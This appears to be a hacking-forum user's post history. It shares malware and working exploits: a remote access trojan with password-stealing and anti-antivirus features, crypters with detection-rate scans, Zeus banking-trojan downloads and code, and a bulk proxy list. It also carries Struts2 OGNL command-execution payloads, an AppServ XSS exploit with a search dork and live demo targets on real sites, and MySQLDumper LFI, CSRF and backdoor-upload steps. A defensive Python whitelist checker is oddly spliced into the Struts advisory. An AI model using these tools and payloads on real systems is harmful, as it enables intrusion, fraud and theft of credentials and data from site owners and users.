
io.kent
Active Members
Posts: 2325
Days Won: 21

Everything posted by io.kent

  1. Server options: Disable UAC; Disable System Restore; StartUp Server; MSN Pass; Google Chrome Pass (under construction for v2 with help from other software); Firefox Pass (under construction for v2 with help from other software); Delay Execute; Disable Firewall (all OS); Anti-virtual machines (VBox, VMware, Virtual PC); Anti-Sniffers RunTime; Anti-Cmd RunTime; Anti-Scans (Jotti, VirusTotal, Virscan, chk4me); Anti-Task Manager; Anti-SandBox; Anti-SysAnalyzer; Restart server; Close server; Share users with the author.
     Manager options: Desktop Capture; Upload File and Execute; Download File; Update server via URL; Open remote site; List processes (under construction for v2); List drives (under construction for v2).
     Lamer options: Shut down remote PC; Restart remote PC; Hide Icons; Show Icons; Open CD; Close CD; Turn off monitor; Turn on monitor.
     Scan: NoVirusThanks
     Report date: 2012-09-12 08:46:48 (GMT 1); File name: m3-rat-v1-exe; File size: 2167243 bytes; MD5 hash: 699455ed1b50f898ae4d1c310c609499; SHA1 hash: 17b7f0bb8302474f392fc3fe07196911b641a5c1; Detection rate: 0 on 14 (0%); Status: CLEAN
     Asquared 08:46:49 5.1.0.3 Avast 08:46:49 5.0 AVG 08:46:49 10.0.0.1190 Avira 08:46:49 7.11.7.12 BitDefender 08:46:49 7.0.0.2555 ClamAV 08:46:49 0.97.4 Comodo 08:46:49 1.0 DrWeb 08:46:49 5.0.2 Fprot 08:46:49 6.0 IkarusT3 08:46:49 T31001097 Panda 08:46:49 10.0.3.0 STOPZilla 08:46:49 5.0.0.0 TrendMicro 08:46:49 9.200.0.1012 VBA32 08:46:49 3.12.0.300
     (Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org)
     File information: Report date: 2012-09-12 08:44:45 (GMT 1); File name: stub-exe; File size: 350532 bytes; MD5 hash: 63a68344ebd878b8c8353ce67e3a05b5; SHA1 hash: 70fb56865faf1ee6f5c210af7d8bc0fd8e3163a1; Detection rate: 1 on 14 (7%); Status: INFECTED
     Asquared 08:44:46 5.1.0.3 Avast 08:44:46 5.0 AVG 08:44:46 10.0.0.1190 Avira 08:44:46 7.11.7.12 BitDefender 08:44:46 7.0.0.2555 ClamAV 08:44:46 0.97.4 Comodo 08:44:46 1.0 DrWeb 08:44:46 5.0.2 Fprot 08:44:46 6.0 IkarusT3 08:44:45 T31001097 Panda 08:44:46 10.0.3.0 STOPZilla 08:44:46 5.0.0.0 Trojan.Win32.Mal.Gen.36092 TrendMicro 08:44:46 9.200.0.1012 VBA32 08:44:46 3.12.0.300
     (Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org)
     Download: Multiupload.nl
     Decrypt code: ÚËÔÙÒÕÕÚÊ»
     Encrypted with VELTROZ and TITANCRYPT
  2. PEcompact 3.03.23 beta + Patch
     PECompact3 is a utility of the genre known as "executable packers". Executable packers compress executables and modules so that their physical size is considerably smaller than it originally was. At runtime, the module (executable) is decompressed and reconstructed in memory. With high-performance executable packers such as PECompact v2.x, decompression and reconstruction is so rapid that load time may actually improve, since the time saved by reading fewer bytes from the disk or network may exceed the time spent reconstructing and decompressing the module.
     PEcompact 3.03.23 beta + Patch.rar (1.28 MB)
     Download: setup.rar from Sendspace.com
     pass :: level-23.biz
  3. Adobe After Effects (39 Videos), DreamWeaver (41 Videos), Flash (6 Videos), Photoshop (9 Videos), Premiere Pro (12 Videos)
     Computer Programming: Android Development (200 Videos), C (15 Videos), C# (200 Videos), C++ (73 Videos), C++ GUI with Qt (14 Videos), Cocos 2D (20 Videos), Computer Game Development (17 Videos), iPhone Development (37 Videos), Java - Beginner (87 Videos), Java - Intermediate (59 Videos), Java - Game Development (36 Videos), Java - Game Development with Slick (12 Videos), JavaScript (40 Videos), jQuery (200 Videos), Objective-C (65 Videos), PHP (200 Videos), PHP Stock Market Analyzer (20 Videos), Python (43 Videos), Ruby (32 Videos), Trading Website (Project Lisa) (45 Videos), Visual Basic (200 Videos), wxPython (14 Videos)
     Computer Science: 3Ds Max 2010 (22 Videos), How to Build a Computer (23 Videos), HTML5 (53 Videos), MySQL Database (33 Videos), Networking (6 Videos), UDK - Beginner (65 Videos), UDK - Advanced (2 Videos), XHTML & CSS (46 Videos)
     Educational: Algebra (32 Videos), Basic Math (11 Videos), Biology (22 Videos), Chemistry (38 Videos), How to Build a Go Kart (35 Videos), Introduction to Geometry (63 Videos), Geometry (23 Videos), Physics (45 Videos), Robotics & Electronics (19 Videos)
     Other: Battlefield 2 Gameplay (6 Videos), Backgammon (8 Videos), Bucky Roberts Live (10 Videos), Buckys Vlog (5 Videos), Call of Duty Gameplay (18 Videos), iPhone App Reviews (25 Videos), thenewboston Live! (113 Videos), thenewboston Podcast (39 Videos), Surviving the Wilderness (20 Videos), Surviving the Wilderness 2 (40 Videos)
     Tutorials
  4. A small and simple but working LFI Scanner. Written in Perl. Did this because of the sake of codegrasm. I might remake this scrap and merge this with LaFuzz.
     Download - bunny-v1.0.gz (bunny-pl - bunny-pl-v1.0 - LFI Scanner - Google Project Hosting)
     Command-line access: get a local copy of the bunny-pl repository with this command:
     git clone https://code.google.com/p/bunny-pl/
  5. Scan:
     Report date: 2012-09-11 12:06:34 (GMT 1); File name: troncripter-exe; File size: 1953792 bytes; MD5 hash: 1b4a43a0381e45c7554fad29d2825569; SHA1 hash: 462c51fbbe5528c202528f850b54dd4a17b3971b; Detection rate: 3 on 14 (21%); Status: INFECTED
     Asquared 12:06:34 5.1.0.3 Avast 12:06:34 5.0 AVG 12:06:34 10.0.0.1190 Dropper.VB.3.BS Avira 12:06:34 7.11.7.12 TR/Dropper.Gen BitDefender 12:06:34 7.0.0.2555 ClamAV 12:06:34 0.97.4 Comodo 12:06:34 1.0 DrWeb 12:06:34 5.0.2 Fprot 12:06:34 6.0 IkarusT3 12:06:34 T31001097 Panda 12:06:34 10.0.3.0 STOPZilla 12:06:34 5.0.0.0 TrendMicro 12:06:34 9.200.0.1012 VBA32 12:06:34 3.12.0.300 Malware-Cryptor.VB.gen.5
     (Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org)
     Download: Troncripter_orig.rar
     Decrypt code pass: vgp0unqqvfw
     Encrypted with TitanCrypt
  6. To see all the details about this exploit, please view: r00tsecurity -> Exploit & Advisory Center :: Apache Struts2 <= 2.3.1 Multiple Vulnerabilities

     SEC Consult Vulnerability Lab Security Advisory < 20120104-0 >
     =======================================================================
     title: Multiple critical vulnerabilities in Apache Struts2
     product: Apache Struts2 * OpenSymphony XWork * OpenSymphony OGNL
     vulnerable version: 2.3.1 and below
     fixed version: 2.3.1.1
     impact: critical
     homepage: http://struts.apache.org/
     found: 2011-11-18
     by: Johannes Dahse, Andreas Nusser
     SEC Consult Vulnerability Lab
     https://www.sec-consult.com
     =======================================================================

     Vendor description:
     -------------------
     Apache Struts2 is a web framework for creating Java web applications. It is using the OpenSymphony XWork and OGNL libraries. By default, XWork's ParametersInterceptor treats parameter names provided to actions as OGNL expressions. An OGNL (Object Graph Navigation Language) expression is a limited language similar to Java that is tokenized and parsed by the OGNL parser which invokes appropriate Java methods. This allows e.g. convenient access to properties that have a getter/setter method implemented. By providing a parameter like "product.id=1" the OGNL parser will call the appropriate setter getProduct().setId(1) in the current action context. OGNL is also able to call arbitrary methods, constructors and access context variables. For more details please refer to http://commons.apache.org/ognl/language-guide.html.

     Vulnerability overview/description:
     -----------------------------------
     To prevent attackers calling arbitrary methods within parameters the flag "xwork.MethodAccessor.denyMethodExecution" is set to "true" and the SecurityMemberAccess field "allowStaticMethodAccess" is set to "false" by default. Also, to prevent access to context variables an improved character whitelist for parameter names is applied in XWork's ParametersInterceptor since Struts 2.2.1.1:
     acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[\\(\\)_'\\s]+";
     Under certain circumstances these restrictions can be bypassed to execute malicious Java code.

     1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator)
     When an exception occurs while applying parameter values to properties the value is evaluated as OGNL expression. For example this occurs when setting a string value to a property with type integer. Since the values are not filtered an attacker can abuse the power of the OGNL language to execute arbitrary Java code leading to remote command execution. This issue has been reported (https://issues.apache.org/jira/browse/WW-3668) and was fixed in Struts 2.2.3.1. However the ability to execute arbitrary Java code has been overlooked.

     2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)
     The character whitelist for parameter names is not applied to Struts CookieInterceptor. When Struts is configured to handle cookie names, an attacker can execute arbitrary system commands with static method access to Java functions. Therefore the flag "allowStaticMethodAccess" can be set to true within the request.

     3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor)
     Accessing the flag "allowStaticMethodAccess" within parameters is prohibited since Struts 2.2.3.1. An attacker can still access public constructors with only one parameter of type String to create new Java objects and access their setters with only one parameter of type String. This can be abused for example to create and overwrite arbitrary files. To inject forbidden characters to the filename an uninitialized string property can be used.

     4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor)
     While not being a security vulnerability itself, please note that applications running in developer mode and using Struts DebuggingInterceptor are prone to remote command execution as well. While applications should never run in developer mode during production, developers should be aware that doing so not only has performance issues (as documented) but also a critical security impact.

     Proof of concept:
     -----------------
     1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator)
     Given Test.java has a property "id" of type Integer or Long and appropriate getter and setter methods:
     long id;
     Given test.jsp with result name=input is configured for action "Test": struts.xml: test.jsp
     The following request will trigger an exception, the value will be evaluated as OGNL expression and arbitrary Java code can be executed:
     /Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter("C:/wwwroot/sec-consult.jsp")).append("jsp+shell").close())%2b'
     An attacker can also overwrite flags that will allow direct OS command execution:
     /Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'
     If test.jsp displays the property "id" the result of the Java code evaluation can be accessed:
     <%@ taglib prefix="s" uri="/struts-tags" %>

     2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)
     Given struts.xml is configured to handle all cookie names (independent of limited cookie values): * 1,2
     The following HTTP header will execute an OS command when sent to Test.action:
     Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1

     3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor)
     Given Test.java has an uninitialized property "name" of type String:
     String name; // +getter+setter
     The following request will create/overwrite the file "C:/sec-consult.txt" (empty file):
     /Test.action?name=C:/sec-consult.txt&x[new+java.io.FileWriter(name)]=1
     The existence of the property 'x' used in these examples is of no importance.

     4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor)
     Given struts.xml is configured to run in developer mode and to use the debugging interceptor:
     The following request will execute arbitrary OGNL expressions leading to remote command execution:
     /Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc')

     Vulnerable / tested versions:
     -----------------------------
     All products using Struts2 are affected by at least one critical vulnerability listed above!
     Proof of Concept 1.) has been tested with Jetty-6.1.25 26 July 2010 and Struts 2.2.1.1
     Proof of Concepts 2.), 3.) and 4.) have been tested with Jetty-6.1.25 26 July 2010 and Struts 2.2.1.1, 2.2.3.1 and 2.3.1

     Vendor contact timeline:
     ------------------------
     2011-12-14: Contacting vendor through security at struts dot apache dot org
     2011-12-14: Vendor reply, sending advisory draft
     2011-12-14: Vendor released Apache Struts 2.3.1 in parallel
     2011-12-16: Vulnerabilities confirmed in Struts 2.3.1, Vendor contacted
     2011-12-16: Vendor reply, discussing workaround
     2011-12-20: Discussing release of fixed version
     2011-12-21: Providing additional information
     2012-01-03: Vendor informs that update is ready
     2012-01-03: Patch (2.3.1.1) is available

     Solution:
     ---------
     Update to Struts 2.3.1.1

     Workaround:
     -----------
     Update to Struts 2.3.1 and apply a stronger acceptedParamNames filter to the Parameters- and CookieInterceptor:
     acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[_']+";
     Don't run your applications in developer mode.

     Advisory URL:
     -------------
     https://www.sec-consult.com/en/advisories.html
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     SEC Consult Unternehmensberatung GmbH
     Office Vienna
     Mooslackengasse 17
     A-1190 Vienna
     Austria
     Tel.: +43 / 1 / 890 30 43 - 0
     Fax.: +43 / 1 / 890 30 43 - 25
     Mail: research at sec-consult dot com
     https://www.sec-consult.com
     EOF J. Dahse, A. Nusser / 2012
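The advisory's workaround is a character whitelist for parameter names, and a defender tightening it wants to see which names each version of the filter lets through before OGNL evaluation. The following is an added example, not SEC Consult's or the Struts project's code: it compiles the two `acceptedParamNames` patterns quoted above as Python regexes (Java's `String.matches()` is a whole-string match, which `re.fullmatch()` reproduces) and classifies a set of constructed parameter names against both. The sample names and the `audit_request_params` helper are assumptions made for the example.

```python
import re

# Added example (not from the advisory or the Struts project): the two
# parameter-name whitelists quoted in the SEC Consult advisory, written as
# Python regexes. In the Java source each backslash is doubled; the regexes
# below are what the engine actually sees.
DEFAULT_WHITELIST_2_2_1_1 = re.compile(r"[a-zA-Z0-9\.\]\[\(\)_'\s]+")
STRICTER_WHITELIST = re.compile(r"[a-zA-Z0-9\.\]\[_']+")  # advisory's workaround


def is_accepted(param_name: str, pattern: re.Pattern = STRICTER_WHITELIST) -> bool:
    """Return True if the whole parameter name matches the whitelist, i.e. the
    interceptor would hand it to the OGNL parser."""
    return pattern.fullmatch(param_name) is not None


def audit_request_params(params: dict) -> dict:
    """Classify each parameter name (hypothetical helper for this example):
    'ok' if both whitelists accept it, 'weak-only' if only the 2.2.1.1
    default accepts it, 'rejected' if neither does. A defender rolling out
    the stricter filter would log the 'weak-only' names to see what changes."""
    verdicts = {}
    for name in params:
        if is_accepted(name, STRICTER_WHITELIST):
            verdicts[name] = "ok"
        elif is_accepted(name, DEFAULT_WHITELIST_2_2_1_1):
            verdicts[name] = "weak-only"
        else:
            verdicts[name] = "rejected"
    return verdicts


# Constructed sample query parameters: ordinary Struts property names next to
# names carrying characters the stricter whitelist no longer allows.
SAMPLE_PARAMS = {
    "product.id": "1",      # plain property path, accepted by both
    "items[0].name": "x",   # indexed property, accepted by both
    "x(y)": "1",            # parentheses: only the 2.2.1.1 default lets this through
    "a b": "1",             # whitespace (\s): only the 2.2.1.1 default lets this through
    "foo#bar": "1",         # '#' is outside both whitelists
    "flag=true": "1",       # '=' is outside both whitelists
}

if __name__ == "__main__":
    for name, verdict in audit_request_params(SAMPLE_PARAMS).items():
        print(f"{name!r}: {verdict}")
```

The difference between the two patterns is exactly the parentheses and whitespace class, which is what the advisory's workaround removes; anything with `#`, `@`, `=`, `,` or quotes other than `'` is already rejected by the 2.2.1.1 default.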
  7. Download: Zippyshare.com - En-Decrypt Vita13.rar (no password)
     Scan (NoVirusThanks): Report date: 2012-09-11 09:37:38 (GMT 1); File name: en-decrypt-vita13-exe; File size: 365568 bytes; MD5 hash: 9bd772ad1e268b4593457eaaf9539ec9; SHA1 hash: bbe5e25a914ce5cbf786d55d20dd9be107dde88b; Detection rate: 0 on 14 (0%); Status: CLEAN
     Asquared 09:37:38 5.1.0.3 Avast 09:37:38 5.0 AVG 09:37:38 10.0.0.1190 Avira 09:37:38 7.11.7.12 BitDefender 09:37:38 7.0.0.2555 ClamAV 09:37:38 0.97.4 Comodo 09:37:38 1.0 DrWeb 09:37:38 5.0.2 Fprot 09:37:38 6.0 IkarusT3 09:37:38 T31001097 Panda 09:37:38 10.0.3.0 STOPZilla 09:37:38 5.0.0.0 TrendMicro 09:37:38 9.200.0.1012 VBA32 09:37:38 3.12.0.300
     (Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org)
  8. .::[ HacKer Hades Shell ]::. Password: hadeshtml. Deserves a like!
  9. zeus
     Download zeus zB2089.zip server: http://www.mediafire.com/file/x5x1xayj1tnsgbd/server[php].zip
     I take no responsibility; you use them at your own risk... If anyone doesn't know how to configure it, tell me and I'll configure it! FOR ALL RsT MEMBERS: PASSWORD BY PM!
     edit// I don't give the password to users with 0 posts, don't ask; the password is given from 50 posts upward!
  10. Dude, I didn't take it from there; I didn't even know about that site. It's taken from somewhere else, much better. I also have the complete Zeus program; if someone wants to give me a better site I'll put it up, and you get it for free!
  11. I'd give you the source too, but I can't, because there are dumps and CVVs in there in bulk, and because of that I can't post the source..
  12. #ifdef _DEBUGLITE
            OutputDebugStringEx(__FUNCTION__" : ERROR : hMutex is still active");
      #endif
            return FALSE;
          }

          // Deleting files
          if (!DeleteHiddenFile(szZeusPath)) {
      #ifdef _DEBUGLITE
            OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusPath);
      #endif
          }
      #ifndef ZEUS_FASTCLEAN
          if (!DeleteHiddenFile(szZeusConfig)) {
      #ifdef _DEBUGLITE
            OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusConfig);
      #endif
          }
          if (!DeleteHiddenFile(szZeusLog)) {
      #ifdef _DEBUGLITE
            OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusLog);
      #endif
          }
      #endif
      #ifdef _DEBUGLITE
          OutputDebugStringEx(__FUNCTION__" : INFO : EXIT");
      #endif
          return TRUE;
        }
  13. 118.233.96.32:2248 119.235.50.162:1080 122.104.148.123:45499 143.88.80.34:47038 173.213.145.181:35105 173.65.254.183:39121 173.88.243.186:4243 177.43.215.214:1080 178.157.41.10:1080 184.5.234.15:46545 200.140.146.140:1080 202.109.133.181:1080 202.195.128.106:1080 207.182.140.85:1080 207.194.87.105:1080 218.202.180.94:1080 220.162.14.114:1080 27.120.84.55:20864 36.55.233.70:26641 36.55.234.175:56619 46.117.88.202:11156 46.38.0.164:1080 61.177.248.202:1080 62.212.74.30:16248 62.33.191.41:20719 66.205.148.56:19781 67.160.55.1:51302 67.173.249.120:1846 68.153.213.71:27888 68.194.182.186:33482 69.204.234.171:20880 71.193.21.192:15311 71.205.149.97:28346 71.92.114.194:47165 76.170.117.151:42393 76.99.197.144:52393 78.88.139.236:5201 81.19.35.170:1080 82.18.254.182:45109 85.122.101.100:12350 85.226.186.182:4462 88.165.5.173:49802 93.127.3.99:1080 93.184.71.114:1080 94.195.120.210:6147 98.204.160.34:27202 98.220.56.75:4891 1.85.17.82:1080 106.1.59.94:21868 107.8.91.9:9478 112.162.30.135:4970 116.48.41.89:7782 117.103.173.226:1080 117.204.165.15:1080 119.60.9.90:1080 14.201.85.117:27956 146.115.132.12:11134 151.42.144.229:2281 173.245.228.177:11844 173.72.104.220:2749 178.63.120.140:1080 187.28.115.84:3752 187.33.50.254:1080 190.206.246.7:1080 190.254.93.52:49278 200.127.29.96:2118 205.178.127.176:14025 206.174.26.38:24149 206.72.201.92:1080 212.156.91.198:1080 218.7.191.182:1080 219.147.172.2:12345 221.1.215.90:1080 221.214.208.226:1080 24.53.48.60:59787 24.98.131.195:10753 31.11.70.158:4715 36.55.233.192:54859 36.55.233.192:64544 46.146.246.106:1080 46.161.171.105:46214 58.185.112.164:38679 62.44.110.80:3647 65.185.123.8:33644 66.169.87.186:5849 67.85.85.117:14649 68.54.150.141:29141 69.118.254.97:33439 70.95.255.217:50645 71.122.77.86:4571 71.125.60.218:22336 71.172.237.233:1454 71.172.237.233:28998 71.193.21.192:20453 71.194.161.16:39341 71.194.93.93:1783 72.78.136.71:34943 72.79.208.169:43115 74.123.23.42:44709 74.65.35.100:21353 76.120.134.176:1099 
76.79.191.205:38989 78.46.186.204:4554 79.129.17.76:1080 79.132.65.97:1080 80.14.219.117:8491 81.213.157.150:10941 84.55.88.152:25938 87.101.117.10:10794 87.248.191.69:21 88.203.33.209:5025 90.151.160.197:1080 90.215.123.168:29203 98.204.160.34:4143 98.222.169.158:1800 98.243.148.116:60109 108.21.59.69:7977 122.160.148.113:1080 125.88.125.201:1080 173.190.218.30:45193 173.54.5.44:1794 183.178.247.76:8777 184.154.139.92:1080 206.174.26.38:11366 206.72.194.35:1080 24.183.147.163:28208 24.191.93.15:32830 24.191.93.15:58985 24.3.51.27:31597 24.53.48.60:60593 27.120.84.55:16143 36.55.233.70:59648 36.55.234.175:57059 37.49.37.230:38105 62.212.74.30:13314 62.212.74.30:19062 64.79.77.189:22642 66.229.18.79:47247 66.30.120.241:2607 67.165.15.135:19866 67.165.15.135:29749 67.170.90.243:1794 67.222.203.132:1529 68.193.133.124:25646 68.194.39.143:1826 68.37.60.250:46463 68.51.206.196:2527 69.119.71.122:1205 69.245.171.75:35877 71.125.60.218:51977 71.194.161.16:52559 71.235.105.130:28648 71.79.245.167:45388 71.8.85.133:23643 71.92.114.194:7189 72.43.175.154:52440 72.79.208.169:47541 75.68.42.8:22985 75.73.144.197:18436 76.120.97.67:33167 76.124.108.98:26192 76.188.63.161:23329 76.3.15.35:50404 76.90.166.59:1486 80.14.219.117:23340 80.50.144.146:1080 80.7.179.173:3247 80.78.79.75:8058 82.239.135.218:54039 82.99.199.28:1080 88.165.5.173:60027 88.168.145.126:4689 89.201.51.206:1080 90.150.9.38:1080 90.151.160.196:1080 91.225.76.83:1080 93.167.245.52:1788 96.22.125.9:12993 98.154.55.224:55201 98.209.217.96:8975 98.217.212.7:1627 108.15.77.84:51289 115.108.177.250:1080 141.255.160.144:1200 173.178.181.143:10796 173.217.74.204:36587 173.54.5.44:30284 173.58.203.178:55861 173.76.102.51:36190 174.54.209.10:56780 202.96.33.216:1080 216.75.122.47:28715 24.154.27.166:2805 24.170.60.94:1643 24.247.125.164:15270 24.247.66.2:6342 24.3.51.27:1089 58.185.112.164:40176 64.53.207.142:48421 66.176.202.121:10481 66.189.10.40:1974 67.81.13.128:1421 69.138.109.176:6153 69.139.85.38:1727 
71.198.40.135:1955 71.229.54.158:12195 71.71.71.162:4483 71.8.71.43:2849 71.80.89.117:49858 72.216.36.143:2461 74.77.68.90:1330 76.108.68.185:1611 76.24.90.108:11213 77.242.27.80:8741 81.17.23.214:1111 93.167.245.61:1693 98.109.138.251:31048
  14. Exploit Title: Apache 2.5.9=>2.5.10(win) Xss Vulnerability
      Author: Angel Injection
      url: http://www.appservnetwork.com
      Security -::RISK: Critical
      Dork For Keds: intext:"The AppServ Open Project - 2.5.10 for Windows" or intext:"The AppServ Open Project - 2.5.9 for Windows"
      Exploit: index.php
      index.php?appservlang='"()%26%251[cross site scripting]
      Code:
      <li><a href=\"appserv/ChangeLog.txt\"><span class=\"app\">"._CHANGELOG."</span></a></li>
      <li> <a href=\"appserv/README-$appservlang.php?appservlang=$appservlang\"><span class=\"app\">"._README."</span></a></li>
      <li><a href=\"appserv/AUTHORS.txt\"><span class=\"app\">"._AUTHOR."</span></a></li>
      <li><a href=\"appserv/COPYING.txt\"><span class=\"app\">"._COPYING."</span></a></li>
      http://server/index.php?appservlang='"()%26%251[cross site scripting]
      http://server/index.php?appservlang='"()%26%251"><script>alert(document.cookie)</script>
      DEMO SITE:
      http://203.131.209.137/index.php?appservlang=%27%22%28%29%26%251%3Cscript%3Ealert%281337%29%3C/script%3E
      http://sts.nthu.edu.tw/index.php?appservlang=%27%22%28%29%26%251%3Cscript%3Ealert%281337%29%3C/script%3E
  15. Vulnerable Software: MySQLDumper Version 1.24.4 Downloaded from: [url]http://sourceforge.net/projects/mysqldumper/files/[/url] (MD5 SUM: b62357a0d5bbb43779d16427c30966a1 *MySQLDumper1.24.4.zip) ================================================================================================ About Software: What is MySQLDumper ? MySQLDumper is a PHP and Perl based tool for backing up MySQL databases. You can easily dump your data into a backup file and - if needed - restore it. It is especially suited for shared hosting webspaces, where you don't have shell access. MySQLDumper is an open source project and released under the GNU-license. ================================================================================================ Tested: *php.ini MAGIC_QUOTES_GPC OFF* Safe mode off /* OS: Windows XP SP2 (32 bit) Apache: 2.2.21.0 PHP Version: 5.2.17.17 MYSQL: 5.5.23 ================================================================================================ Vuln Desc: MySQLDumper Version 1.24.4 is prone to: LFI,XSS,CSRF,PHP CODE ExeCution,traversal,Info Disclosure vulns. Local File Inclusion [url]http://192.168.0.15/learn/cubemail/install.php?language=../../../../../../../../../../../../../../../../../etc/passwd%00[/url] /* Vulnerable COde Section //install.php if (!@ob_start("ob_gzhandler")) @ob_start(); $install_ftp_server=$install_ftp_user_name=$install_ftp_user_pass=$install_ftp_path=""; $dbhost=$dbuser=$dbpass=$dbport=$dbsocket=$manual_db=''; foreach ($_GET as $getvar=>$getval) { ${$getvar}=$getval; } foreach ($_POST as $postvar=>$postval) { ${$postvar}=$postval; } include_once ( './inc/functions.php' ); include_once ( './inc/mysql.php' ); include_once ( './inc/runtime.php' ); if (!isset($language)) $language="en"; $config['language']=$language; include ( './language/lang_list.php' ); include ( 'language/' . $language . '/lang_install.php' ); include ( 'language/' . $language . '/lang_main.php' ); include ( 'language/' . $language . 
'/lang_config_overview.php' ); */ XSS on inputs via $_POST [url]http://192.168.0.15/learn/cubemail/install.php?phase=1&language=en&submit=Installation[/url] [url]http://192.168.0.15/learn/cubemail/index.php?page=javascript:alert%28document.cookie%29;[/url] /*VUlnerable code section //index.php <?php if (!@ob_start("ob_gzhandler")) @ob_start(); include ('./inc/functions.php'); $page=(isset($_GET['page'])) ? $_GET['page'] : 'main.php'; if (!file_exists("./work/config/mysqldumper.php")) { header("location: install.php"); ob_end_flush(); die(); } ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="Author" content="Daniel Schlichtholz"> <title>MySQLDumper</title> </head> <frameset border=0 cols="190,*"> <frame name="MySQL_Dumper_menu" src="menu.php" scrolling="no" noresize frameborder="0" marginwidth="0" marginheight="0"> <frame name="MySQL_Dumper_content" src="<?php echo $page; // <=here is ?>" scrolling="auto" frameborder="0" marginwidth="0" marginheight="0"> </frameset> </html> <?php ob_end_flush(); */ XSS via $_GET [url]http://192.168.0.15/learn/cubemail/install.php?phase=8%3Cscript%3Ealert%281%29;%3C/script%3E&language=en&submit=Installation[/url] [url]http://192.168.0.15/learn/cubemail/sql.php?db=0&dbid=1&tablename=%3Cscript%3Ealert%281%29;%3C/script%3E[/url] [url]http://192.168.0.15/learn/cubemail/sql.php?db=0&dbid=%3Cscript%3Ealert%281%29;%3C/script%3E&tablename=1[/url] [url]http://192.168.0.15/learn/cubemail/restore.php?filename=%3Cscript%3Ealert%281%29;%3C/script%3E[/url] CSRF Delete application protection via $_GET <img src="http://192.168.0.15/learn/cubemail/main.php?action=deletehtaccess" /> *After this Application will become fully unprotected from World.* CSRF Drop database: <img src="http://localhost/tld/meonyourpc.PNG" heigth="250" width="300" /> <form name="hackit" id="hackit" 
action="http://192.168.0.15/learn/cubemail/main.php?action=db&dbid=1" method="post"> <p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p> <input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit"> </form> kill0 is always information_schema (obviously you can't drop it) Try to increment that index in ex: kill1 etc. CSRF Uninstall Application via $_GET [url]http://192.168.0.15/learn/cubemail/install.php?language=en&phase=101[/url] or [url]http://192.168.0.15/learn/cubemail/install.php?language=en&phase=2[/url] (This will delete existing config.php file) CSRF change password: <body onload="javascript:document.forms[0].submit()"> <form method="post" action="http://192.168.0.15/learn/cubemail/main.php?action=schutz"> <input name="username" id="username" type="text" value="pwnyou" /> <input name="userpass1" id="userpass1" type="text" value="pwnyou" /> <input name="userpass2" id="userpass2" type="text" value="pwnyou" /> <!--SHA1 (all Systems) --> <input type="radio" name="type" id="type2" value="2" checked="checked" > </form> username:pwnyou password:pwnyou CSRF:Execute SQL commands via $_GET In eg:( Create Denial Of Service Condition) <img src="http://192.168.0.15/learn/cubemail/sql.php?sql_statement=select+benchmark%28100000000,md5%28now%28%29%29%29--" heigth="0" width="0" /> After gain access to application (in eg: after successfully exploitation CSRF via delete protection technique) remote attacker can use this techniques to upload his/her backdoor. As result this will completely compromise site. *Upload backdoor:* Rename your backdoor on your pc to me.php.gz Then switch to: [url]http://192.168.0.15/learn/cubemail/filemanagement.php?action=files[/url] Upload it: Then Switch to: [url]http://192.168.0.15/learn/cubemail/main.php?action=edithtaccess[/url] On input box called: File: enter relative/absolute path to your uploaded me.php.gz (default ./work/backup/me.php.gz) Click RELOAD button. 
On inputbox called File: Change file extension to: ./work/backup/me.php Click save button and Vuala you have your own backdoor there. You can find it: [url]http://192.168.0.15/learn/cubemail/work/backup/me.php[/url] Same tehcnique can be used without upload any file: Todo so: Switch to [url]http://192.168.0.15/learn/cubemail/filemanagement.php?action=files[/url] Enter non existent file name on input called File: in eg: mybackdoor.php Click reload button. it will ask *Create it?* Click *Create* Button. Copy paste your backdoor content to textarea and Click Save button. Same technique can be used to add CUSTOM .htaccess Handler (to execute backdoor in eg: as *.gif file) *NOTE* Second technique can be used by attacker to overwrite existing files./read arbitraty files on site/server. Theris also chance to execute our code using eval PHP language *construct*. We have PHP Code ExeCution here: Vulnerable code section: /* //menu.php if (isset($_POST['selected_config'])||isset($_GET['config'])) { if (isset($_POST['selected_config'])) $new_config=$_POST['selected_config']; // Configuration was switched in content frame? 
    if (isset($_GET['config'])) $new_config=$_GET['config']; // restore the last active menuitem
    if (is_readable($config['paths']['config'].$new_config.'.php'))
    {
        clearstatcache();
        unset($databases);
        $databases=array();
        if (read_config($new_config))
        {
            $config['config_file']=$new_config;
            $_SESSION['config_file']=$new_config; //$config['config_file'];
            $config_refresh=' <script language="JavaScript" type="text/javascript">
                if (parent.MySQL_Dumper_content.location.href.indexOf("config_overview.php")!=-1) {
                    var selected_div=parent.MySQL_Dumper_content.document.getElementById("sel").value;
                } else selected_div=\'\';
